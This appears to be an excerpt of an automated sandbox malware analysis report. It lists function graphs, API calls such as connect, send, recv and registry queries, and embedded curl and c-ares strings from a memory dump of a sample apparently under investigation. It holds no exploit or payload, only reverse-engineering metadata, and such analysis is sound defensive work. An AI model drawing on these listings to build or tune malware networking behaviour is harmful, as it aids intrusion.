                                                          • bind failed with errno %d: %s, xrefs: 0088B080
                                                          • Trying %s:%d..., xrefs: 0088A7C2, 0088A7DE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: setsockopt
                                                          • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                          • API String ID: 3981526788-2373386790
                                                          • Opcode ID: 6398f8a12a5e94ce449ae460f97b5c12ddcf8a25792a0dc80c25ff0d01a7d054
                                                          • Instruction ID: c0d96920daa3c6f7faf347ba07791ddc7903f31e399494119724cc89ba80e537
                                                          • Opcode Fuzzy Hash: 6398f8a12a5e94ce449ae460f97b5c12ddcf8a25792a0dc80c25ff0d01a7d054
                                                          • Instruction Fuzzy Hash: 9E62F371508341ABE725EF24C846BABB7E4FF91314F04492AF988D7292E771E845CB93
                                                          Function 00919740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 862 919740-91975b 863 919780-919782 862->863 864 91975d-919768 call 9178a0 862->864 865 919914-91994e call bd8b70 RegOpenKeyExA 863->865 866 919788-9197a0 call bd8e00 call 9178a0 863->866 871 9199bb-9199c0 864->871 872 91976e-919770 864->872 879 919950-919955 865->879 880 91995a-919992 RegQueryValueExA RegCloseKey call bd8b98 865->880 866->871 876 9197a6-9197c5 866->876 877 919a0c-919a15 871->877 875 919772-91977e 872->875 872->876 875->866 886 919827-919833 876->886 887 9197c7-9197e0 876->887 879->877 888 919997-9199b5 call 9178a0 880->888 889 919835-91985c call 90e2b0 * 2 886->889 890 91985f-919872 call 915ca0 886->890 891 9197e2-9197f3 call bd8b50 887->891 892 9197f6-919809 887->892 888->871 888->876 889->890 902 9199f0 890->902 903 919878-91987d call 9177b0 890->903 891->892 892->886 901 91980b-919810 892->901 901->886 906 919812-919822 901->906 905 9199f5-9199fb call 915d00 902->905 910 919882-919889 903->910 916 9199fe-919a09 905->916 906->877 910->905 915 91988f-91989b call 904fe0 910->915 915->902 921 9198a1-9198c3 call bd8b50 call 9178a0 915->921 916->877 926 9199c2-9199ed call 90e2b0 * 2 921->926 927 9198c9-9198db call 90e2d0 921->927 926->902 927->926 931 9198e1-9198f0 call 90e2d0 927->931 931->926 937 9198f6-919905 call 9163f0 931->937 942 919f66-919f7f call 915d00 937->942 943 91990b-91990f 937->943 942->916 945 919a3f-919a5a call 916740 call 9163f0 943->945 945->942 951 919a60-919a6e call 916d60 945->951 954 919a70-919a94 call 916200 call 9167e0 call 916320 951->954 955 919a1f-919a39 call 916840 call 9163f0 951->955 966 919a16-919a19 954->966 967 919a96-919ac6 call 90d120 954->967 955->942 955->945 966->955 968 919fc1 966->968 972 919ae1-919af7 call 90d190 967->972 973 919ac8-919adb call 90d120 967->973 970 919fc5-919ffd call 915d00 call 90e2b0 * 2 968->970 970->916 972->955 980 919afd-919b09 call 904fe0 972->980 973->955 973->972 980->968 986 919b0f-919b29 call 90e730 980->986 992 919f84-919f88 986->992 993 919b2f-919b3a call 9178a0 986->993 994 919f95-919f99 992->994 993->992 1000 919b40-919b54 call 90e760 993->1000 996 919fa0-919fb6 call 90ebf0 * 2 994->996 997 919f9b-919f9e 994->997 1009 919fb7-919fbe 996->1009 997->968 997->996 1005 919f8a-919f92 1000->1005 1006 919b5a-919b6e call 90e730 1000->1006 1005->994 1012 919b70-91a004 1006->1012 1013 919b8c-919b97 call 9163f0 1006->1013 1009->968 1017 91a015-91a01d 1012->1017 1021 919c9a-919cab call 90ea00 1013->1021 1022 919b9d-919bbf call 916740 call 9163f0 1013->1022 1019 91a024-91a045 call 90ebf0 * 2 1017->1019 1020 91a01f-91a022 1017->1020 1019->970 1020->970 1020->1019 1029 919f31-919f35 1021->1029 1030 919cb1-919ccd call 90ea00 call 90e960 1021->1030 1022->1021 1039 919bc5-919bda call 916d60 1022->1039 1035 919f40-919f61 call 90ebf0 * 2 1029->1035 1036 919f37-919f3a 1029->1036 1050 919cfd-919d0e call 90e960 1030->1050 1051 919ccf 1030->1051 1035->955 1036->955 1036->1035 1039->1021 1049 919be0-919bf4 call 916200 call 9167e0 1039->1049 1049->1021 1069 919bfa-919c0b call 916320 1049->1069 1059 919d10 1050->1059 1060 919d53-919d55 1050->1060 1054 919cd1-919cec call 90e9f0 call 90e4a0 1051->1054 1071 919d47-919d51 1054->1071 1072 919cee-919cfb call 90e9d0 1054->1072 1064 919d12-919d2d call 90e9f0 call 90e4a0 1059->1064 1063 919e69-919e8e call 90ea40 call 90e440 1060->1063 1087 919e90-919e92 1063->1087 1088 919e94-919eaa call 90e3c0 1063->1088 1091 919d5a-919d6f call 90e960 1064->1091 1092 919d2f-919d3c call 90e9d0 1064->1092 1085 919c11-919c1c call 917b70 1069->1085 1086 919b75-919b86 call 90ea00 1069->1086 1076 919dca-919ddb call 90e960 1071->1076 1072->1050 1072->1054 1097 919ddd-919ddf 1076->1097 1098 919e2e-919e36 1076->1098 1085->1013 1110 919c22-919c33 call 90e960 1085->1110 1086->1013 1107 919f2d 1086->1107 1095 919eb3-919ec4 call 90e9c0 1087->1095 1117 919eb0-919eb1 1088->1117 1118 91a04a-91a04c 1088->1118 1113 919d71-919d73 1091->1113 1114 919dc2 1091->1114 1092->1064 1120 919d3e-919d42 1092->1120 1095->955 1127 919eca-919ed0 1095->1127 1106 919e06-919e21 call 90e9f0 call 90e4a0 1097->1106 1103 919e38-919e3b 1098->1103 1104 919e3d-919e5b call 90ebf0 * 2 1098->1104 1103->1104 1115 919e5e-919e67 1103->1115 1104->1115 1142 919de1-919dee call 90ec80 1106->1142 1143 919e23-919e2c call 90eac0 1106->1143 1107->1029 1129 919c35 1110->1129 1130 919c66-919c75 call 9178a0 1110->1130 1125 919d9a-919db5 call 90e9f0 call 90e4a0 1113->1125 1114->1076 1115->1063 1115->1095 1117->1095 1123 91a057-91a070 call 90ebf0 * 2 1118->1123 1124 91a04e-91a051 1118->1124 1120->1063 1123->1009 1124->968 1124->1123 1158 919d75-919d82 call 90ec80 1125->1158 1159 919db7-919dc0 call 90eac0 1125->1159 1134 919ee5-919ef2 call 90e9f0 1127->1134 1136 919c37-919c51 call 90e9f0 1129->1136 1155 91a011 1130->1155 1156 919c7b-919c8f call 90e7c0 1130->1156 1134->955 1152 919ef8-919f0e call 90e440 1134->1152 1136->1013 1173 919c57-919c64 call 90e9d0 1136->1173 1167 919df1-919e04 call 90e960 1142->1167 1143->1167 1174 919f10-919f26 call 90e3c0 1152->1174 1175 919ed2-919edf call 90e9e0 1152->1175 1155->1017 1156->1013 1170 919c95-91a00e 1156->1170 1179 919d85-919d98 call 90e960 1158->1179 1159->1179 1167->1098 1167->1106 1170->1155 1173->1130 1173->1136 1174->1175 1189 919f28 1174->1189 1175->955 1175->1134 1179->1114 1179->1125 1189->968
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00919946
                                                          • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00919974
                                                          • RegCloseKey.KERNELBASE(?), ref: 0091998B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                          • API String ID: 3677997916-4129964100
                                                          • Opcode ID: 9f0aff6a9bc4822817481f92ebdbd7c11b403afaa2bca91ee52272cee4dce4af
                                                          • Instruction ID: 8cea353b9050c34a96e592360b0ce5da644827bacef7a017835fa2c39ca9783e
                                                          • Opcode Fuzzy Hash: 9f0aff6a9bc4822817481f92ebdbd7c11b403afaa2bca91ee52272cee4dce4af
                                                          • Instruction Fuzzy Hash: AA32D9B5B04205AFEB11AB24EC52B9B76E8AF94314F084838FC4996263F731ED55C753
                                                          Function 00888B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1365 888b50-888b69 1366 888b6b-888b74 1365->1366 1367 888be6 1365->1367 1369 888beb-888bf2 1366->1369 1370 888b76-888b8d 1366->1370 1368 888be9 1367->1368 1368->1369 1371 888b8f-888ba7 call 866e40 1370->1371 1372 888bf3-888bfe call 88a550 1370->1372 1379 888cd9-888d16 SleepEx 1371->1379 1380 888bad-888baf 1371->1380 1377 888de4-888def 1372->1377 1378 888c04-888c08 1372->1378 1383 888e8c-888e95 1377->1383 1384 888df5-888e19 call 88a150 1377->1384 1381 888dbd-888dc3 1378->1381 1382 888c0e-888c1d 1378->1382 1401 888d18-888d20 1379->1401 1402 888d22 1379->1402 1385 888bb5-888bb9 1380->1385 1386 888ca6-888cb0 1380->1386 1381->1368 1389 888c1f-888c30 connect 1382->1389 1390 888c35-888c48 call 88a150 1382->1390 1387 888f00-888f06 1383->1387 1388 888e97-888e9c 1383->1388 1422 888e88 1384->1422 1423 888e1b-888e26 1384->1423 1385->1369 1393 888bbb-888bc2 1385->1393 1386->1379 1391 888cb2-888cb8 1386->1391 1387->1369 1395 888e9e-888eb6 call 862a00 1388->1395 1396 888edf-888eef call 8578b0 1388->1396 1389->1390 1421 888c4d-888c4f 1390->1421 1397 888ddc-888dde 1391->1397 1398 888cbe-888cd4 call 88b180 1391->1398 1393->1369 1400 888bc4-888bcc 1393->1400 1395->1396 1420 888eb8-888edd call 863410 * 2 1395->1420 1425 888ef2-888efc 1396->1425 1397->1368 1397->1377 1398->1377 1406 888bce-888bd2 1400->1406 1407 888bd4-888bda 1400->1407 1409 888d26-888d39 1401->1409 1402->1409 1406->1369 1406->1407 1407->1369 1414 888bdc-888be1 1407->1414 1417 888d3b-888d3d 1409->1417 1418 888d43-888d61 call 86d8c0 call 88a150 1409->1418 1424 888dac-888db8 call 8950a0 1414->1424 1417->1397 1417->1418 1440 888d66-888d74 1418->1440 1420->1425 1428 888c8e-888c93 1421->1428 1429 888c51-888c58 1421->1429 1422->1383 1430 888e28-888e2c 1423->1430 1431 888e2e-888e85 call 86d090 call 894fd0 1423->1431 1424->1369 1425->1387 1433 888dc8-888dd9 call 88b100 1428->1433 1434 888c99-888c9f 1428->1434 1429->1428 1437 888c5a-888c62 1429->1437 1430->1422 1430->1431 1431->1422 1433->1397 1434->1386 1441 888c6a-888c70 1437->1441 1442 888c64-888c68 1437->1442 1440->1369 1446 888d7a-888d81 1440->1446 1441->1428 1448 888c72-888c8b call 8950a0 1441->1448 1442->1428 1442->1441 1446->1369 1450 888d87-888d8f 1446->1450 1448->1428 1454 888d9b-888da1 1450->1454 1455 888d91-888d95 1450->1455 1454->1369 1458 888da7 1454->1458 1455->1369 1455->1454 1458->1424
                                                          APIs
                                                          • connect.WS2_32(?,?,00000001), ref: 00888C30
                                                          • SleepEx.KERNELBASE(00000000,00000000), ref: 00888CF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: Sleepconnect
                                                          • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                          • API String ID: 238548546-879669977
                                                          • Opcode ID: ab45a9e97a216dd7bf2b0874086da0be7bcb273548cfb82ab6e2c8653d3795e6
                                                          • Instruction ID: 00f661efa25fac53df922d3b09e9e2263db2545ea592a6df66987adb48bcdeea
                                                          • Opcode Fuzzy Hash: ab45a9e97a216dd7bf2b0874086da0be7bcb273548cfb82ab6e2c8653d3795e6
                                                          • Instruction Fuzzy Hash: 28B1BE70604746EFDB20EF24C885BA6B7A1FF81328F448529E859CB2D2DB71EC55C762
                                                          Function 00852F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1459 852f17-852f8c call c8f570 call c8f960 1464 8531c9-8531cd 1459->1464 1465 852f91-852ff4 call 851619 RegOpenKeyExA 1464->1465 1466 8531d3-8531d6 1464->1466 1469 8531c5 1465->1469 1470 852ffa-85300b 1465->1470 1469->1464 1471 85315c-8531ac RegEnumKeyExA 1470->1471 1472 853010-853083 call 851619 RegOpenKeyExA 1471->1472 1473 8531b2-8531c2 RegCloseKey 1471->1473 1476 85314e-853152 1472->1476 1477 853089-8530d4 RegQueryValueExA 1472->1477 1473->1469 1476->1471 1478 8530d6-853137 call c8f840 call c8f8d0 call c8f960 call c8f770 call c8f960 call c8dce0 1477->1478 1479 85313b-85314b RegCloseKey 1477->1479 1478->1479 1479->1476
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: CloseEnumOpen
                                                          • String ID: d
                                                          • API String ID: 1332880857-2564639436
                                                          • Opcode ID: 4264b20df3c6eb05e4e24438c1863308d88613cd87af16d3b59cbf5963dc3bf7
                                                          • Instruction ID: 8d7d7a4fb7bde7f0d4be68ecde2c25d79b7f59d44e82fe67bdbff11c9dba535b
                                                          • Opcode Fuzzy Hash: 4264b20df3c6eb05e4e24438c1863308d88613cd87af16d3b59cbf5963dc3bf7
                                                          • Instruction Fuzzy Hash: 8B71B3B49043099FDB00EF69D58479EBBF0FF84358F10896DE898A7351D7749A888F92
                                                          Function 00889290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1492 889290-8892ed call 8576a0 1495 8893c3-8893ce 1492->1495 1496 8892f3-8892fb 1492->1496 1505 8893d0-8893e1 1495->1505 1506 8893e5-889427 call 86d090 call 894f40 1495->1506 1497 8893aa-8893af 1496->1497 1498 889301-889333 call 86d8c0 call 86d9a0 1496->1498 1499 8893b5-8893bc 1497->1499 1500 889456-889470 1497->1500 1516 889335-889364 WSAIoctl 1498->1516 1517 8893a7 1498->1517 1503 889429-889431 1499->1503 1504 8893be 1499->1504 1509 889439-88943f 1503->1509 1510 889433-889437 1503->1510 1504->1500 1505->1499 1511 8893e3 1505->1511 1506->1500 1506->1503 1509->1500 1515 889441-889453 call 8950a0 1509->1515 1510->1500 1510->1509 1511->1500 1515->1500 1520 88939b-8893a4 1516->1520 1521 889366-88936f 1516->1521 1517->1497 1520->1517 1521->1520 1524 889371-889390 setsockopt 1521->1524 1524->1520 1525 889392-889395 1524->1525 1525->1520
                                                          APIs
                                                          • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0088935D
                                                          • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00889389
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: Ioctlsetsockopt
                                                          • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                          • API String ID: 1903391676-2691795271
                                                          • Opcode ID: 2cf1cea6c51b1166fa09f4ca37bb634a77199ecd6741b817b17529f2cc55b7d9
                                                          • Instruction ID: 2a51da5bc375b9d7fcdc8c0b3bb04d51ec9bc8279be98eb34c38ea7adc49a312
                                                          • Opcode Fuzzy Hash: 2cf1cea6c51b1166fa09f4ca37bb634a77199ecd6741b817b17529f2cc55b7d9
                                                          • Instruction Fuzzy Hash: 3351A071A04305ABD711EF24C881FBAB7A5FF85314F188529FD889B392E730E995C791
                                                          Function 008576A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1526 8576a0-8576be 1527 8576e6-8576f2 send 1526->1527 1528 8576c0-8576c7 1526->1528 1529 8576f4-857709 call 8572a0 1527->1529 1530 85775e-857762 1527->1530 1528->1527 1531 8576c9-8576d1 1528->1531 1529->1530 1533 8576d3-8576e4 1531->1533 1534 85770b-857759 call 8572a0 call 85cb20 call bd8c50 1531->1534 1533->1529 1534->1530
                                                          APIs
                                                          • send.WS2_32(multi.c,?,?,?,00853D4E,00000000,?,?,008607BF), ref: 008576EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: send
                                                          • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                          • API String ID: 2809346765-3388739168
                                                          • Opcode ID: 896c8497e8b7a74a28fa8102d08477e4172a8df548da0c7830daa4925f4841ed
                                                          • Instruction ID: 8fe52d6635278392406b4c43509a960fc0c5f712d74ee44f1efcb63ea67c4f9d
                                                          • Opcode Fuzzy Hash: 896c8497e8b7a74a28fa8102d08477e4172a8df548da0c7830daa4925f4841ed
                                                          • Instruction Fuzzy Hash: 9D1120B1618344BFD5209F19BC86E273B9CEBC5B6AF445A15FC08A33D2D5919C0CC6B2
                                                          Function 00857770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1645 857770-85778e 1646 8577b6-8577c2 recv 1645->1646 1647 857790-857797 1645->1647 1649 8577c4-8577d9 call 8572a0 1646->1649 1650 85782e-857832 1646->1650 1647->1646 1648 857799-8577a1 1647->1648 1651 8577a3-8577b4 1648->1651 1652 8577db-857829 call 8572a0 call 85cb20 call bd8c50 1648->1652 1649->1650 1651->1649 1652->1650
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
